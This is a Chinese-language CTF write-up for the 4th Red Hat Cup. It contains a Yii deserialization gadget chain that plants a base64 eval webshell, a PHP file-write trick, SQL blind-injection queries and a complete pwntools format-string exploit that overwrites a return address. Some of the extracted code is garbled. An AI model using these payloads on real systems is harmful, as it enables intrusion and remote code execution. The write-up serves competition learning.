Find it
访问robots.txt有1ndexx.php这个文件的提示,于是猜测是.1ndexx.php.swp
下载获取Index.php源码
通过get请求会将code参数的内容经过过滤后写入到hack.php文件
于是写入phpinfo:
http://eci-2ze8lvwn3slcjmen7myw.cloudeci1.ichunqiu.com/index.php?code=%3C?php%20phpinfo();?%3E
然后访问hack.php
全局搜索flag
Framework
扫描目录,有个www.zip备份文件泄露
下载下来查看源码,在SiteController.php文件中有个反序列化
在网上找到yii反序列化的poc
http://cache.baiducontent.com/c?m=3LbAFz0_U1MpDXeQajsF6xTWz4wPcuA8ku2ccxkFGEZsnPHkvGkZns1v7WaWJuPoG8Qxz11V0dzU_3EoRurznIJzpgDbfguBO24k21cqx9ltcs3xyRqsSlFkhGmkCostpQUp9p2kFbeohcJcRVZGHH_36EDLTMe0RsLMrS6Ah6W&p=97759a42d49a02e709a2c7710f7a&newp=cb7ec45b86cc46ad05bcc7710f7a92695d0fc20e3ad7da01298ffe0cc4241a1a1a3aecbf2c251b07d0c3766c00a54c56ebf436703d0034f1f689df08d2ecce7e72d9&s=cfcd208495d565ef&user=baidu&fm=sc&query=yii%B7%B4%D0%F2%C1%D0%BB%AF&qid=a8ef4ca50000f93e&p1=1
修改poc写入一个一句话:
// Yii unserialize() gadget chain used in this writeup.  This script executes
// nothing dangerous itself: the constructors only pre-fill properties, and the
// last line serializes the object graph and prints it base64-encoded for the
// "message" parameter shown below.  The effect happens on the target when
// unserialize() rebuilds the graph and the framework's magic methods walk it to
// a caller-controlled callable.
// NOTE(review): namespace separators look stripped by extraction ("yiibase" is
// presumably yii\base, "yiirestCreateAction" presumably yii\rest\CreateAction);
// confirm against the linked poc before reading further.
// Defensive takeaway: never unserialize() attacker-controlled input; prefer
// json_decode(), or at least unserialize($s, ['allowed_classes' => false]).
namespace yiibase{
class View{
}
}
namespace yiirest{
class CreateAction{
public $checkAccess;   // set to 'assert' below: on PHP < 8 assert() evaluates a string argument as code
public $id;            // the PHP statement string handed to that callable
public function __construct(){
$this->checkAccess = 'assert';
$this->id = 'file_put_contents("cmd.php", base64_decode("PD9waHAgZXZhbCgkX1BPU1RbY21kXSk/Pg=="));';
}
}
}
namespace Faker{
use yiirestCreateAction;
class Generator{
protected $formatters;   // 'close' => [CreateAction, 'run']; presumably reached via a magic-method dispatch in the target framework — TODO confirm
public function __construct(){
$this->formatters['close'] = [new CreateAction(), 'run'];
}
}
}
namespace yiidb{
use FakerGenerator;
class BatchQueryResult{
private $_dataReader;   // outermost object of the serialized graph; holds the Generator above
public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
$a = new yiidbBatchQueryResult;
// NOTE(review): $a is never serialized — the echo below serializes a fresh
// instance — so this assignment does not affect the payload (leftover from the poc).
$a->checkAccess = array(new yiibaseView(),"evaluateDynamicContent");
echo base64_encode(serialize(new yiidbBatchQueryResult));
}
?>
本地运行得到序列化后的字符串:
然后进行反序列化:
http://eci-2zeg1tmyhxfbs2zo7lle.cloudeci1.ichunqiu.com/index.php?r=site%2Fabout&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NjoiYXNzZXJ0IjtzOjI6ImlkIjtzOjg0OiJmaWxlX3B1dF9jb250ZW50cygiY21kLnBocCIsIGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnWlhaaGJDZ2tYMUJQVTFSYlkyMWtYU2svUGc9PSIpKTsiO31pOjE7czozOiJydW4iO319fX0
接着蚁剑连接cmd.php,通过插件Apach_mod_cgi绕过disable_function
然后执行根目录下的readflag文件得到flag
Hpcurve
找到了国外的一篇文章,参考原题:
https://jsur.in/posts/2020-12-21-hxp-ctf-2020-hyper-writeup
输出的前24个字节是已知的。在算法中,u[i]代表了除数的Mumford表示形式中的多项式u(x)。我们不知道的是输出的接下来的24个字节,它们对应于RNG中v(x)——除数的Mumford表示形式中的另一个多项式——的系数,因此我们的任务是以某种方式恢复它们。
import itertools
import struct
# Sage script, not plain Python: `GF`, `HyperellipticCurve`, `prod` and the
# `^`/`^^` (power / XOR) operators below are Sage syntax.
p = 10000000000000001119
R.= GF(p)[]; y=x   # NOTE(review): generator name lost in extraction — Sage syntax is `R.<x> = GF(p)[]`; confirm against the linked writeup
f = y + prod(map(eval, 'yyyyyyy'))   # NOTE(review): the curve equation also looks garbled here — verify against the original source
C = HyperellipticCurve(f, 0)
J = C.jacobian()
# Base divisors on the Jacobian from the curve points above x = 11, 22, 33
# (not used further in this excerpt).
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]
enc = bytes.fromhex('66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5')
# Known-plaintext prefix (see the description above): 20 'a' bytes then "flag",
# which exposes the first 24 keystream bytes.
known_pt = b"a"*20 + b"flag"
rng_output = bytes(e^^m for e,m in zip(enc, known_pt))   # keystream prefix = ciphertext XOR known plaintext
blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]   # three 64-bit little-endian words
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]   # u(x) of the Mumford representation, rebuilt from the leak
L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]
RR.= PolynomialRing(L)   # NOTE(review): generator name lost here too (`RR.<X> = PolynomialRing(L)`)
# v(x) must satisfy v(r)^2 = f(r) at each root r of u; interpolate it from one
# choice of square root per root, then try both signs per coefficient below.
v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
vi = [(int(-c), int(c)) for c in vi]   # sign of each coefficient is ambiguous: keep both candidates
for rs in itertools.product(*vi):
    q = struct.pack('<'+'Q'*len(rs), *rs)   # candidate for the next 24 keystream bytes
    flag = bytes(k^^m for k,m in zip(2*(rng_output+q), enc))   # 48-byte keystream doubled so zip covers all of enc
    print(flag)
flag{1b82f60a-43ab-4f18-8ccc-97d120aae6fc}
WebsiteManager
查看页面源码,发现有个image.php
存在数字型盲注
查出表:
select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()
查出字段名:
select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/%26%26/**/table_name=0x7573657273
(另一伙伴根据源码的值也猜测字段为username、password)
跑出用户名:
exists(select/**/1/**/from/**/users/**/where/**/username/**/like/**/%27admin%%27)
http://eci-2ze56uon9iidh9jquq85.cloudeci1.ichunqiu.com/image.php?id=1%26%26exists(select/**/1/**/from/**/users/**/where/**/password/**/like/**/%27%%27)
通过burp跑密码
跑出来账号密码:admin/b753c87d26f98ac2b9593
使用file协议获取根目录下的flag
Colorful code
下载压缩包内容:
打开之后data1像是图片RGB的位置,宽高为data1字符长度分解的质数,data2中三个字节是一组RGB
写脚本运行之后为:
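from PIL import Image
import matplotlib.pyplot as plt  # unused in this script; kept from the original listing

# Rebuild the image: data2 holds raw bytes, three per palette entry (R, G, B);
# data1 holds space-separated indices into that palette, one per pixel, laid
# out on a 191 x 37 grid (see the note above).  Files are closed via `with`
# instead of being left open for the interpreter to reclaim.
with open('data2', 'rb') as file2:
    RGB_data = file2.read()
with open('data1') as file1:
    data2 = file1.read().split(' ')

width = 191
high = 37

# Palette: consecutive (r, g, b) triples from data2.
result = [tuple(RGB_data[i * 3:i * 3 + 3]) for i in range(len(RGB_data) // 3)]

# The last split element is dropped (presumably an empty string after a
# trailing separator in data1 — confirm against the file).
result2 = [result[int(i)] for i in data2[:-1]]

# Canvas is (high, width) = 37 x 191 pixels; pixel (j, i) takes entry i + j*width.
image = Image.new('RGB', (high, width), (255, 255, 255))
for j in range(high):
    for i in range(width):
        image.putpixel((j, i), result2[i + j * width])
image.save('output.png')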
图片上传npiet online !
得出flag 88842f20-fb8c-45c9-ae8f-36135b6a0f11
签到题
下载压缩包文件:
EBCDIC.txt
搜索EBCDIC得出
直接转换 EBCDIC 转ASCII 得出flag
primegame
题目参考http://www.secmem.org/blog/2020/09/20/poka-science-war-hacking/。建立一个25阶的矩阵,使用LLL算法来求格的最短向量,因为flag字符为可见字符,在0-128之间,所以设置边界为0-127。sage脚本如下,其中N是在遍历可能存在的误差,这个值可能会存在多个,但是最后flag是一致的。
import math
from decimal import *
import random
import struct
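getcontext().prec = int(100)  # 100 significant digits so the Decimal logs survive the 2**256 scaling

# Primes below 100 by trial division against the primes found so far.
# Trial division can stop once j*j > i.  (The page's version compared
# `i * i < j`, which is never true for i < 100, so it silently tested every
# prime; the resulting list is identical, this is just the intended early exit.)
primes = [2]
for i in range(3, 100):
    is_prime = True
    for j in primes:
        if j * j > i:
            break
        if i % j == 0:
            is_prime = False
            break
    if is_prime:
        primes.append(i)

# Lattice weights: natural log of each prime as a 100-digit Decimal, and the
# same values scaled by 2**256 and truncated to integers.  The int() wrappers
# keep Sage's preparser from substituting its own Integer type.
keys = [Decimal(int(pr)).ln() for pr in primes]
arr = [int(k * int(2) ** int(256)) for k in keys]

# Target ciphertext for this instance (the commented value is an alternative kept from the original script).
ct = 597952043660446249020184773232983974017780255881942379044454676980646417087515453
#ct =425985475047781336789963300910446852783032712598571885345660550546372063410589918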
def encrypt(res):
    """Rebuild the challenge's ciphertext value from a digit vector ``res``.

    ``res[i]`` is weighted by ``keys[i]`` (the Decimal natural log of the
    i-th prime); the Decimal sum is scaled by 2**256 and truncated to an int,
    which the caller compares against the leaked ``ct``.  Indexing follows
    ``keys``, so a ``res`` shorter than ``keys`` raises IndexError.
    """
    total = Decimal(int(0))
    for idx, weight in enumerate(keys):
        total += res[idx] * weight
    return int(total * int(2) ** int(256))
def f(N):
    """One LLL attempt with the lattice entries scaled down by ``N``.

    Builds the (ln+1) x (ln+1) integer matrix whose first ln rows are
    e_i | arr[i] // N and whose last row is 64,...,64 | ct // N, reduces it
    with LLL, and treats every reduced row whose first ln entries lie in
    [-64, 64) as a candidate: adding 64 maps them back into 0..127 (the
    printable range the description above assumes for flag bytes).  A
    candidate that re-encrypts to ``ct`` is printed together with ``N``.
    ``Matrix``, ``ZZ`` and ``.LLL()`` are Sage names; ``arr``, ``ct`` and
    ``encrypt`` come from module scope.
    """
    ln = len(arr)
    A = Matrix(ZZ, ln + 1, ln + 1)
    for i in range(ln):
        A[i, i] = 1
        A[i, ln] = arr[i] // N
        A[ln, i] = 64   # shifts the target coordinates so 0..127 becomes -64..63
    A[ln, ln] = ct // N
    res = A.LLL()
    for i in range(ln + 1):
        flag = True
        for j in range(ln):
            if -64 <= res[i][j] < 64:
                continue
            flag = False
            break
        if flag:
            vec = [int(v + 64) for v in res[i][:-1]]   # undo the -64 shift; drop the last (ct) coordinate
            ret = encrypt(vec)
            if ret == ct:
                print(N, bytes(vec))
# Sweep the scaling divisor; the description above notes that several N may
# reproduce ct, but they all decode to the same flag.
for i in range(2, 10000):
    f(i)
flag{715c39c3-1b46-4c23-8006-27b43eba2446}
Parser
该题是分析http协议,其中数据包有个格式化字符串的漏洞,先利用格式化泄露出栈地址和libc地址,然后通过格式化的任意写,改返回地址为one_gadget即可。
完整exp
from pwn import*
# Writeup exploit for the "Parser" pwn task, written for Python 2 pwntools
# (print statements, str payloads).  Root cause, as stated in the description
# above: request data reaches a printf-family call as the format string, so
# "%p" reads stack/libc pointers back and "%hhn" writes bytes to the stack.
# The server-side fix is the standard one: printf("%s", buf) and building with
# -Wformat -Werror=format-security.
# NOTE(review): the host/port, the stack deltas and the 0x10a45c offset are
# specific to this CTF instance and to the libc-2.27 build named in the
# commented-out process() lines; the listing as rendered is also not verbatim
# ('x61' and the curly quotes on the final send look like extraction artifacts).
context(os='linux',arch='amd64')
context.log_level=True
#p = process(["./ld-2.27.so", "./a"],env={"LD_PRELOAD":"./libc-2.27.so"})
#p=process('./chall',env={'LD_PRELOAD':'./libc-2.27.so'})
#p=process('./chall')
p=remote('47.105.94.48',12435)
p.recvuntil('> ')
# HTTP request skeleton the parser accepts; each payload is this text with the
# format string appended.  The literal must stay byte-exact, newlines included.
string='''POST / HTTP/1.1
Host: 1
User-Agent: 222
Accept: 1
Accept-Language: 1
Accept-Encoding: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: 1
Content-Length: -1n
'''
payload=string+'%227$p%13$p'   # leak step: two stack slots, a libc address and a stack address
#47
p.sendline(payload)
leak=int(p.recv(14),16)
stack=int(p.recv(14),16)
ret=stack+(0x00007fffffffed68-0x00007fffffffe870)   # saved return address = leaked stack slot + a fixed delta (presumably measured in a debugger)
print hex(ret)
libcbase=leak-(0x7ffff7a03b97-0x7ffff79e2000)   # libc base = leaked address - its offset inside that libc build
print hex(libcbase)
one=libcbase+0x10a45c
print hex(one)
# Target value split into bytes; one write per byte below.
first=one&0xff
sec=one>>8&0xff
thr=one>>16&0xff
four=one>>24&0xff
five=one>>32&0xff
p.recvuntil('> ')
# Five single-byte writes to ret .. ret+4 (bytes 5-7 of a userland address are
# presumably already zero).  Each request pads the format to 24 bytes so that
# the p64() address lands at the stack slot the %42$ specifier refers to.
payload=string+("%"+str(first)+"c%42$hhn").ljust(24,'x61')+p64(ret)
#47
p.send(payload)
p.recvuntil('> ')
payload=string+("%"+str(sec)+"c%42$hhn").ljust(24,'x61')+p64(ret+1)
p.send(payload)
p.recvuntil('> ')
payload=string+("%"+str(thr)+"c%42$hhn").ljust(24,'x61')+p64(ret+2)
#47
p.send(payload)
p.recvuntil('> ')
#gdb.attach(p,'b *0x000055555555537d')
#raw_input()
payload=string+("%"+str(four)+"c%42$hhn").ljust(24,'x61')+p64(ret+3)
#47
p.send(payload)
p.recvuntil('> ')
payload=string+("%"+str(five)+"c%42$hhn").ljust(24,'x61')+p64(ret+4)
#47
p.send(payload)
p.send(‘111’)   # final input that makes the vulnerable function return
p.interactive()
flag{45540201c332aeff4c0edac9d7588241}
本文始发于微信公众号(山石网科安全技术研究院):第四届红帽杯网络安全大赛WriteUp